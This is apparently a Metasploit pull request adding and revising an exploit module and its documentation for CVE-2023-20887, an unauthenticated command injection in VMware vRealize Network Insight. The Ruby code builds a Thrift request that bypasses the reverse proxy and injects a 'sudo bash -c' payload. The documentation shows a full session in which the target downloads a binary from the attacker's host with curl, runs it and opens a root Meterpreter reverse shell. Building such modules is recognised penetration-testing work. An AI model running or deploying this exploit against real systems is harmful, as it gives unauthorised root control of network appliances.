### PR TITLE
(Attempt 2) VMWare vRealize Network Insight pre-authenticated RCE CVE-2023-20887

### DIFF
--- a/documentation/modules/exploit/linux/http/vmware_vrni_rce_cve_2023_20887.md
+++ b/documentation/modules/exploit/linux/http/vmware_vrni_rce_cve_2023_20887.md
@@ -62,10 +62,10 @@ msf6 > use linux/http/vmware_vrni_rce_cve_2023_20887
 [*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
 msf6 exploit(linux/http/vmware_vrni_rce_cve_2023_20887) > set rhost 192.168.1.60
 rhost => 192.168.1.60
-msf6 exploit(linux/http/vmware_vrni_rce_cve_2023_20887) > set lhost 192.168.1.69
-lhost => 192.168.1.69
-msf6 exploit(linux/http/vmware_vrni_rce_cve_2023_20887) > set FETCH_SRVHOST 192.168.1.69
-FETCH_SRVHOST => 192.168.1.69
+msf6 exploit(linux/http/vmware_vrni_rce_cve_2023_20887) > set lhost 192.168.1.67
+lhost => 192.168.1.67
+msf6 exploit(linux/http/vmware_vrni_rce_cve_2023_20887) > set FETCH_SRVHOST 192.168.1.67
+FETCH_SRVHOST => 192.168.1.67
 msf6 exploit(linux/http/vmware_vrni_rce_cve_2023_20887) > options
 
 Module options (exploit/linux/http/vmware_vrni_rce_cve_2023_20887):
@@ -96,11 +96,11 @@ Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
    FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
    FETCH_DELETE        false            yes       Attempt to delete the binary after execution
    FETCH_FILENAME      hHTNUdqFrV       no        Name to use on remote system when storing payload; cannot contain spaces.
-   FETCH_SRVHOST       192.168.1.69     yes       Local IP to use for serving payload
+   FETCH_SRVHOST       192.168.1.67     yes       Local IP to use for serving payload
    FETCH_SRVPORT       8080             yes       Local port to use for serving payload
    FETCH_URIPATH                        no        Local URI to use for serving payload
    FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces.
-   LHOST               192.168.1.69     yes       The listen address (an interface may be specified)
+   LHOST               192.168.1.67     yes       The listen address (an interface may be specified)
    LPORT               4444             yes       The listen port
 
 

--- a/documentation/modules/exploit/linux/http/vmware_vrni_rce_cve_2023_20887.md
+++ b/documentation/modules/exploit/linux/http/vmware_vrni_rce_cve_2023_20887.md
@@ -1,0 +1,113 @@
+## Vulnerable Application
+
+VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection
+when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a
+remote unauthenticated attacker to execute arbitrary commands on the underlying operating system
+as the root user. The RPC interface is protected by a reverse proxy which can be bypassed.
+VMware has evaluated the severity of this issue to be in the Critical severity range with a
+maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the
+context of `root` on the appliance.
+VMWare 6.x version are vulnerable.
+
+This module exploits the vulnerability to upload and execute payloads gaining root privileges.
+Successfully tested against version 6.8.0.
+
+### Install
+
+
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use linux/http/vmware_vrni_rce_cve_2023_20887`
+1. Do: `set rhost [ip]`
+1. Do: `set lhost [ip]`
+1. Do: `set FETCH_SRVHOST [ip]`
+1. Do: `run`
+1. You should get a root shell.
+
+## Options
+
+## Scenarios
+
+### VMware vRealize Network Insight 6.8.0 1666364233
+
+```
+msf6 > use linux/http/vmware_vrni_rce_cve_2023_20887
+[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/vmware_vrni_rce_cve_2023_20887) > set rhost 192.168.1.60
+rhost => 192.168.1.60
+msf6 exploit(linux/http/vmware_vrni_rce_cve_2023_20887) > set lhost 192.168.1.69
+lhost => 192.168.1.69
+msf6 exploit(linux/http/vmware_vrni_rce_cve_2023_20887) > set FETCH_SRVHOST 192.168.1.69
+FETCH_SRVHOST => 192.168.1.69
+msf6 exploit(linux/http/vmware_vrni_rce_cve_2023_20887) > options
+
+Module options (exploit/linux/http/vmware_vrni_rce_cve_2023_20887):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   192.168.1.60     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    443              yes       The target port (TCP)
+   SSL      true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      hHTNUdqFrV       no        Name to use on remote system when storing payload; cannot contain spaces.
+   FETCH_SRVHOST       192.168.1.69     yes       Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces.
+   LHOST               192.168.1.69     yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix (In-Memory)
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/vmware_vrni_rce_cve_2023_20887) > run
+
+[*] Started reverse TCP handler on 192.168.1.69:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.1.60:443 can be exploited.
+[+] The target appears to be vulnerable. Target is running VMWare Aria Operations for Networks (vRealize Network Insight).
+[*] Executing Unix (In-Memory) with curl -so ./hPflBCdJ http://192.168.1.69:8080/IuNTbJhCeJ7dM3CRAasGAw; chmod +x ./hPflBCdJ; ./hPflBCdJ &
+[*] pop thy shell!!!
+[*] Sending stage (3045348 bytes) to 192.168.1.60
+[*] Meterpreter session 3 opened (192.168.1.69:4444 -> 192.168.1.60:47346) at 2023-06-16 15:02:53 -0400
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.1.60
+OS           : Ubuntu 18.04 (Linux 5.4.0-126-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```

--- a/documentation/modules/exploit/linux/http/vmware_vrni_rce_cve_2023_20887.md
+++ b/documentation/modules/exploit/linux/http/vmware_vrni_rce_cve_2023_20887.md
@@ -14,7 +14,7 @@ Successfully tested against version 6.8.0.
 
 ### Install
 
-The OVA file can be downloaded from the VMware Customer Connect portal. 
+The OVA file can be downloaded from the VMware Customer Connect portal.
 
 1. Import the file VMware-vRealize-Network-Insight-6.8.0.1666364233-platform.ova into VMware Fusion
 2. Login with the given credentials `consoleuser:console`

--- a/documentation/modules/exploit/linux/http/vmware_vrni_rce_cve_2023_20887.md
+++ b/documentation/modules/exploit/linux/http/vmware_vrni_rce_cve_2023_20887.md
@@ -14,6 +14,30 @@ Successfully tested against version 6.8.0.
 
 ### Install
 
+The OVA file can be downloaded from the VMware Customer Connect portal. 
+
+1. Import the file VMware-vRealize-Network-Insight-6.8.0.1666364233-platform.ova into VMware Fusion
+2. Login with the given credentials `consoleuser:console`
+3. Run the `setup` command to begin setup
+
+Starting Step 1/4: Create User Passwords
+1. Enter and re-enter SSH_User_Password: `notpassword`
+2. Enter and re-enter CLI_User_Password: `notpassword`
+
+Starting Step 2/4: Network Configuration:
+1. Enter IP_Family: `ipv4`
+2. Enter IP_Address: `192.168.1.60`
+3. Enter Default_Gateway: `192.168.1.254`
+4. Enter DNS: `4.2.2.4 8.8.8.8`
+5. Enter Domain_Search: `example.com`
+6. Save configuration: `y`
+
+Starting Step 3/3: Network Time Server Configuration:
+1. Is the Network Time Security supported for NTP servers? `n`
+2. Enter NTP servers: `0.us.pool.ntp.org`
+
+Step 4/4: Web-Proxy (Optional Configuration)
+1. Configure web proxy?: `n`
 
 
 ## Verification Steps

--- a/documentation/modules/exploit/linux/http/vmware_vrni_rce_cve_2023_20887.md
+++ b/documentation/modules/exploit/linux/http/vmware_vrni_rce_cve_2023_20887.md
@@ -7,7 +7,7 @@ as the root user. The RPC interface is protected by a reverse proxy which can be
 VMware has evaluated the severity of this issue to be in the Critical severity range with a
 maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the
 context of `root` on the appliance.
-VMWare 6.x version are vulnerable.
+VMWare versions 6.2 to 6.10 are vulnerable.
 
 This module exploits the vulnerability to upload and execute payloads gaining root privileges.
 Successfully tested against version 6.8.0.
@@ -114,16 +114,17 @@ Exploit target:
 
 View the full module info with the info, or info -d command.
 
-msf6 exploit(linux/http/vmware_vrni_rce_cve_2023_20887) > run
+msf6 exploit(linux/http/vmware_vrni_rce_cve_2023_20887) > rexploit
+[*] Reloading module...
 
-[*] Started reverse TCP handler on 192.168.1.69:4444
+[*] Started reverse TCP handler on 192.168.1.67:4444
 [*] Running automatic check ("set AutoCheck false" to disable)
 [*] Checking if 192.168.1.60:443 can be exploited.
-[+] The target appears to be vulnerable. Target is running VMWare Aria Operations for Networks (vRealize Network Insight).
-[*] Executing Unix (In-Memory) with curl -so ./hPflBCdJ http://192.168.1.69:8080/IuNTbJhCeJ7dM3CRAasGAw; chmod +x ./hPflBCdJ; ./hPflBCdJ &
-[*] pop thy shell!!!
+[+] The target is vulnerable. VMWare Aria Operations for Networks (vRealize Network Insight) version 6.8.0 was found.
+[*] Executing Unix (In-Memory) with curl -so ./yjUczQeXbCf http://192.168.1.67:8080/VtUnMtEdkI5A0Lv6Y2zkFw; chmod +x ./yjUczQeXbCf; ./yjUczQeXbCf &
+[*] Attempting to execute shell
 [*] Sending stage (3045348 bytes) to 192.168.1.60
-[*] Meterpreter session 3 opened (192.168.1.69:4444 -> 192.168.1.60:47346) at 2023-06-16 15:02:53 -0400
+[*] Meterpreter session 9 opened (192.168.1.67:4444 -> 192.168.1.60:52370) at 2023-07-20 14:50:13 -0400
 
 meterpreter > getuid
 Server username: root

--- a/modules/exploits/linux/http/vmware_vrni_rce_cve_2023_20887.rb
+++ b/modules/exploits/linux/http/vmware_vrni_rce_cve_2023_20887.rb
@@ -1,0 +1,134 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE',
+        'Description' => %q{
+          VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.
+          a malicious actor can get remote code execution in the context of 'root' on the appliance.
+          VMWare 6.x version are vulnerable.
+
+          This module exploits the vulnerability to upload and execute payloads gaining root privileges.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Sina Kheirkhah', # Metasploit Module (@SinSinology) of Summoning Team (@SummoningTeam) on twitter
+        ],
+        'References' => [
+            ['CVE', 'CVE-2023-20887'],
+            ['URL', 'https://www.vmware.com/security/advisories/VMSA-2023-0012.html'],
+            ['URL', 'https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/'],
+        ],
+        'DisclosureDate' => '2023-06-07',
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Privileged' => true,
+        'Targets' => [
+          [
+            'Unix (In-Memory)',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :in_memory,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_bash'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X64],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => [ 'curl', 'printf' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+  end
+
+  def check_vrni
+    return send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/api/vip/i18n/api/v2/translation/products/vRNIUI/versions/6.8.0/locales/en-GB/components/UI?pseudo=false')
+    })
+  rescue StandardError => e
+    elog("#{peer} - Communication error occurred: #{e.message}", error: e)
+    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")
+  end
+
+  def execute_command(cmd, _opts = {})
+    print_status("pop thy shell!!!")
+    pop_thy_shell = "[1,\"createSupportBundle\",1,0,{\"1\":{\"str\":\"1111\"},\"2\":{\"str\":\"`sudo #{cmd}`\"},\"3\":{\"str\":\"value3\"},\"4\":{\"lst\":[\"str\",2,\"AAAA\",\"BBBB\"]}}]"
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path,'/saas./resttosaasservlet'),
+      'ctype' => 'application/x-thrift',
+      'headers' => {
+        'Accept' => 'application/json, text/plain, */*'
+      },
+      'encode_params' => false,
+      'data'     => pop_thy_shell
+     })
+
+  rescue StandardError => e
+    elog("#{peer} - Communication error occurred: #{e.message}", error: e)
+    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")
+  end
+
+  # Checking if the target is potential vulnerable checking the json response to contain the vRNIUI string
+  # that indicates the target is running VMWare Aria Operations for Networks (vRealize Network Insight)
+  def check
+    print_status("Checking if #{peer} can be exploited.")
+    res = check_vrni
+    return CheckCode::Unknown('No response received from the target!') unless res
+
+    body = res.get_json_document
+    if body.nil? || body['data']['productName'] != 'vRNIUI'
+      return CheckCode::Safe('Target is not running VMWare Aria Operations for Networks (vRealize Network Insight).')
+    end
+
+    return CheckCode::Vulnerable if body['data']['productName'] == "6.8.0"
+
+    CheckCode::Appears('Target is running VMWare Aria Operations for Networks (vRealize Network Insight).')
+  end
+
+  def exploit
+    case target['Type']
+    when :in_memory
+      print_status("Executing #{target.name} with #{payload.encoded}")
+      execute_command(payload.encoded)
+    when :linux_dropper
+      print_status("Executing #{target.name}")
+      execute_cmdstager
+    end
+  end
+end

--- a/modules/exploits/linux/http/vmware_vrni_rce_cve_2023_20887.rb
+++ b/modules/exploits/linux/http/vmware_vrni_rce_cve_2023_20887.rb
@@ -96,7 +96,8 @@ class MetasploitModule < Msf::Exploit::Remote
           'pseudo' => 'false'
         }
       })
-      next if res && res.code == 200 && res.body.include?("Failed to get locale list for vRNIUI")
+      next if res && res.code == 200 && res.body.include?('Failed to get locale list for vRNIUI')
+
       break
     end
     res
@@ -116,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'encode_params' => false,
       'data' => shell
     })
-    fail_with(Failure::Unknown, "Communication error occurred") if res.nil?
+    fail_with(Failure::Unknown, 'Communication error occurred') if res.nil?
   end
 
   # Checking if the target is potential vulnerable checking the json response to contain the vRNIUI string

--- a/modules/exploits/linux/http/vmware_vrni_rce_cve_2023_20887.rb
+++ b/modules/exploits/linux/http/vmware_vrni_rce_cve_2023_20887.rb
@@ -48,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
           [
             'Unix (In-Memory)',
             {
-              'Platform' => 'unix',
+              'Platform' => %w[unix linux],
               'Arch' => ARCH_CMD,
               'Type' => :in_memory,
               'DefaultOptions' => {
@@ -87,20 +87,24 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check_vrni
-    res = send_request_cgi({
-      'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, "/api/vip/i18n/api/v2/translation/products/vRNIUI/versions/#{@version}/locales/en-GB/components/UI"),
-      'vars_get' => {
-        'pseudo' => 'false'
-      }
-    })
-    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}") if res.nil?
+    res = nil
+    (2..10).step do |x|
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path, "/api/vip/i18n/api/v2/translation/products/vRNIUI/versions/6.#{x}.0/locales/en-GB/components/UI"),
+        'vars_get' => {
+          'pseudo' => 'false'
+        }
+      })
+      next if res && res.code == 200 && res.body.include?("Failed to get locale list for vRNIUI")
+      break
+    end
     res
   end
 
   def execute_command(cmd, _opts = {})
     print_status('Attempting to execute shell')
-    shell = "[1,\"createSupportBundle\",1,0,{\"1\":{\"str\":\"#{Rex::Text.rand_text_alpha(8)}\"},\"2\":{\"str\":\"`sudo bash -c '#{cmd}'`\"},\"3\":{\"str\":\"#{Rex::Text.rand_text_alpha(8)}\"},\"4\":{\"lst\":[\"str\",2,\"#{Rex::Text.rand_text_alpha(8)}\",\"#{Rex::Text.rand_text_alpha(8)}\"]}}]"
+    shell = "[1,\"createSupportBundle\",1,0,{\"1\":{\"str\":\"#{rand(1000..9999)}\"},\"2\":{\"str\":\"`sudo bash -c '#{cmd}'`\"},\"3\":{\"str\":\"#{Rex::Text.rand_text_alpha(4)}\"},\"4\":{\"lst\":[\"str\",2,\"#{Rex::Text.rand_text_alpha(4)}\",\"#{Rex::Text.rand_text_alpha(4)}\"]}}]"
 
     res = send_request_cgi({
       'method' => 'POST',
@@ -112,7 +116,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'encode_params' => false,
       'data' => shell
     })
-    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}") if res.nil?
+    fail_with(Failure::Unknown, "Communication error occurred") if res.nil?
   end
 
   # Checking if the target is potential vulnerable checking the json response to contain the vRNIUI string
@@ -127,10 +131,10 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Safe('Target is not running VMWare Aria Operations for Networks (vRealize Network Insight).')
     end
 
-    @version = Rex::Version.new(body['data']['productName'])
-    return CheckCode::Vulnerable("VMWare Aria Operations for Networks (vRealize Network Insight) version #{@version} found and vulnerable") if @version >= Rex::Version.new('6.2') && @version <= Rex::Version.new('6.10')
+    version = Rex::Version.new(body['data']['version'])
+    return CheckCode::Vulnerable("VMWare Aria Operations for Networks (vRealize Network Insight) version #{version} found and vulnerable") if version >= Rex::Version.new('6.2') && version <= Rex::Version.new('6.10')
 
-    CheckCode::Appears("Target is running VMWare Aria Operations for Networks (vRealize Network Insight) version #{@version}")
+    CheckCode::Appears("Target is running VMWare Aria Operations for Networks (vRealize Network Insight) version #{version}")
   end
 
   def exploit

--- a/modules/exploits/linux/http/vmware_vrni_rce_cve_2023_20887.rb
+++ b/modules/exploits/linux/http/vmware_vrni_rce_cve_2023_20887.rb
@@ -132,7 +132,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     version = Rex::Version.new(body['data']['version'])
-    return CheckCode::Vulnerable("VMWare Aria Operations for Networks (vRealize Network Insight) version #{version} found and vulnerable") if version >= Rex::Version.new('6.2') && version <= Rex::Version.new('6.10')
+    return CheckCode::Vulnerable("VMWare Aria Operations for Networks (vRealize Network Insight) version #{version} was found.") if version >= Rex::Version.new('6.2') && version <= Rex::Version.new('6.10')
 
     CheckCode::Appears("Target is running VMWare Aria Operations for Networks (vRealize Network Insight) version #{version}")
   end

--- a/modules/exploits/linux/http/vmware_vrni_rce_cve_2023_20887.rb
+++ b/modules/exploits/linux/http/vmware_vrni_rce_cve_2023_20887.rb
@@ -16,24 +16,33 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'VMWare Aria Operations for Networks (vRealize Network Insight) pre-authenticated RCE',
         'Description' => %q{
-          VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8.
-          a malicious actor can get remote code execution in the context of 'root' on the appliance.
+          VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection
+          when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a
+          remote unauthenticated attacker to execute arbitrary commands on the underlying operating system
+          as the root user. The RPC interface is protected by a reverse proxy which can be bypassed.
+          VMware has evaluated the severity of this issue to be in the Critical severity range with a
+          maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the
+          context of 'root' on the appliance.
           VMWare 6.x version are vulnerable.
 
           This module exploits the vulnerability to upload and execute payloads gaining root privileges.
+          Successfully tested against version 6.8.0.
         },
         'License' => MSF_LICENSE,
         'Author' => [
-          'Sina Kheirkhah', # Metasploit Module (@SinSinology) of Summoning Team (@SummoningTeam) on twitter
+          'Sina Kheirkhah', # Metasploit Module, PoC. (@SinSinology) of Summoning Team (@SummoningTeam) on twitter
+          'Anonymous with Trend Micro Zero Day Initiative',
+          'h00die' # msf module updates, corrections, qol
         ],
         'References' => [
-            ['CVE', 'CVE-2023-20887'],
-            ['URL', 'https://www.vmware.com/security/advisories/VMSA-2023-0012.html'],
-            ['URL', 'https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/'],
+          ['CVE', '2023-20887'],
+          ['URL', 'https://www.vmware.com/security/advisories/VMSA-2023-0012.html'],
+          ['URL', 'https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/'],
+          ['URL', 'https://github.com/sinsinology/CVE-2023-20887']
         ],
         'DisclosureDate' => '2023-06-07',
-        'Platform' => ['unix', 'linux'],
-        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Platform' => %w[unix linux],
+        'Arch' => [ARCH_CMD, ARCH_X64],
         'Privileged' => true,
         'Targets' => [
           [
@@ -43,7 +52,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Arch' => ARCH_CMD,
               'Type' => :in_memory,
               'DefaultOptions' => {
-                'PAYLOAD' => 'cmd/unix/reverse_bash'
+                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp'
               }
             }
           ],
@@ -61,6 +70,9 @@ class MetasploitModule < Msf::Exploit::Remote
           ]
         ],
         'DefaultTarget' => 0,
+        'Payload' => {
+          'BadChars' => "\x27"
+        },
         'DefaultOptions' => {
           'RPORT' => 443,
           'SSL' => true
@@ -75,33 +87,32 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check_vrni
-    return send_request_cgi({
+    res = send_request_cgi({
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, '/api/vip/i18n/api/v2/translation/products/vRNIUI/versions/6.8.0/locales/en-GB/components/UI?pseudo=false')
+      'uri' => normalize_uri(target_uri.path, "/api/vip/i18n/api/v2/translation/products/vRNIUI/versions/#{@version}/locales/en-GB/components/UI"),
+      'vars_get' => {
+        'pseudo' => 'false'
+      }
     })
-  rescue StandardError => e
-    elog("#{peer} - Communication error occurred: #{e.message}", error: e)
-    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")
+    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}") if res.nil?
+    res
   end
 
   def execute_command(cmd, _opts = {})
-    print_status("pop thy shell!!!")
-    pop_thy_shell = "[1,\"createSupportBundle\",1,0,{\"1\":{\"str\":\"1111\"},\"2\":{\"str\":\"`sudo #{cmd}`\"},\"3\":{\"str\":\"value3\"},\"4\":{\"lst\":[\"str\",2,\"AAAA\",\"BBBB\"]}}]"
+    print_status('Attempting to execute shell')
+    shell = "[1,\"createSupportBundle\",1,0,{\"1\":{\"str\":\"#{Rex::Text.rand_text_alpha(8)}\"},\"2\":{\"str\":\"`sudo bash -c '#{cmd}'`\"},\"3\":{\"str\":\"#{Rex::Text.rand_text_alpha(8)}\"},\"4\":{\"lst\":[\"str\",2,\"#{Rex::Text.rand_text_alpha(8)}\",\"#{Rex::Text.rand_text_alpha(8)}\"]}}]"
 
     res = send_request_cgi({
       'method' => 'POST',
-      'uri' => normalize_uri(target_uri.path,'/saas./resttosaasservlet'),
+      'uri' => normalize_uri(target_uri.path, '/saas./resttosaasservlet'),
       'ctype' => 'application/x-thrift',
       'headers' => {
         'Accept' => 'application/json, text/plain, */*'
       },
       'encode_params' => false,
-      'data'     => pop_thy_shell
-     })
-
-  rescue StandardError => e
-    elog("#{peer} - Communication error occurred: #{e.message}", error: e)
-    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}")
+      'data' => shell
+    })
+    fail_with(Failure::Unknown, "Communication error occurred: #{e.message}") if res.nil?
   end
 
   # Checking if the target is potential vulnerable checking the json response to contain the vRNIUI string
@@ -116,9 +127,10 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Safe('Target is not running VMWare Aria Operations for Networks (vRealize Network Insight).')
     end
 
-    return CheckCode::Vulnerable if body['data']['productName'] == "6.8.0"
+    @version = Rex::Version.new(body['data']['productName'])
+    return CheckCode::Vulnerable("VMWare Aria Operations for Networks (vRealize Network Insight) version #{@version} found and vulnerable") if @version >= Rex::Version.new('6.2') && @version <= Rex::Version.new('6.10')
 
-    CheckCode::Appears('Target is running VMWare Aria Operations for Networks (vRealize Network Insight).')
+    CheckCode::Appears("Target is running VMWare Aria Operations for Networks (vRealize Network Insight) version #{@version}")
   end
 
   def exploit


### PR DESCRIPTION
fix #18092

Trying not to let #18093 die since the code looked decent and we made it through the PR pretty well.

Technical details at
https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/

Leaving as a draft until I can get back around to it and writing docs